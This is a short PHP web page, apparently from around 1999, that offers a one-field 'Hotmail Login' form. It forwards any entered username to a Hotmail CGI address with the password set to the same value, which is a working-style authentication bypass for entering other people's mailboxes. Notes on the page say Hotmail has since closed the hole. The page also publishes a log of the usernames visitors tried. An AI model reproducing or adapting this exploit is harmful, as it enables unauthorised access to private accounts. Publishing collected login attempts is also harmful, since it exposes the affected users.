<?
if (isset($user))
    
header("Location: http://wya-pop.hotmail.com/cgi-bin/start?curmbox=ACTIVE&js=no&login=$user&passwd=$user");
else
{
    
?>
    <html><head><title>Hotmail Login</title><body bgcolor=white>
    <!--[psychos@lagparty.org][fuka@lagparty.org]-->
    <!--Based off http://www.2038.com/hotmail/-->
    <form action=index.php3 method=get>
    <input type=text name=user size=8>@hotmail.com
    <input type=submit value="Log in">
    <p><p><a href="index.phps">View source</a></form></body></html>
    <p>[12:03] Looks like Hotmail shut it down finally   -psychos
    <p>[16:00] Microsoft PR says "We have determined that it was possible for a malicious hacker with very specific knowledge of advanced Web development languages to gain access to HotMail services."  Advanced Web Development Languages? ... Sure..  =P   - Jon
    <p><p> We have the logs of the user names attempted by this site, the full list is <A HREF = "users.txt">here</A><?
}
?>